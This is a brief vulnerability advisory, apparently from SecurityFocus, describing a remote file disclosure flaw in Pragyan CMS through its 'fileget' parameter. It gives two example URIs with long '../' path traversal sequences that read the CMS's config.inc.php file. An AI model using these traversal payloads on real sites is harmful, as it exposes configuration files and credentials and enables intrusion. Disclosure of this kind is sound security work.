Pragyan CMS 'fileget' Parameter Remote File Disclosure Vulnerability

Attackers can exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php

http://www.example.com/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php


 

Privacy Statement
Copyright 2010, SecurityFocus